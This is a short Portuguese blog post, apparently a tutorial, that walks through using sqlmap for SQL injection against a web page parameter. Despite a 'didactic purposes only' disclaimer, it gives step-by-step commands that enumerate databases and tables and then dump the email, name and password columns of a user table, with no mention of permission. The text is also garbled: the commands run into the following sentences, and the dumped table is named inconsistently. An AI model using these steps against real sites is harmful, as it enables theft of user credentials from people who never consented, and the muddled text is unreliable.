O SQLmap é um script para detecção e SQL injection. Não nos responsabilizamos pelo conteúdo deste post e o intuito foi apenas para fins didáticos.
Primeiramente é necessário que você detect em uma determinada url os parametros que são recebidos via post ou get como formulários, etc..
Sendo assim vamos utilizar o exemplo abaixo para buscar este parametros
python sqlmap.py -u "http://www.teste.com.br/galerias/?id=541" --dbsse tudo correr bem você poderá encontrar o nome do banco de dados utilizado pelo projeto que neste caso é teste. Com isto o segundo passo é encontrar as tabelas do projeto. Enviaremos um injection solicitando as tabelas da seguinte maneira
python sqlmap.py -u "http://www.teste.com.br/galerias/?id=541" -D teste --tablesAgora com os nomes de tabela é possível selecionar as colunas que deseja fazer o dump e simplesmente esperar a coisa acontecer
python sqlmap.py -u "http://www.teste.com.br/galerias/?id=541" -D teste -T tbl_cadastros -C email,nome,senha --dumpcom isto será feito um dump da tabela cbbs no qual poderá ser enviado para um documento de texto qualquer
Seja Membro Gratuítamente
Assine a newsletter para receber em seu email as publicações atualizadas neste blog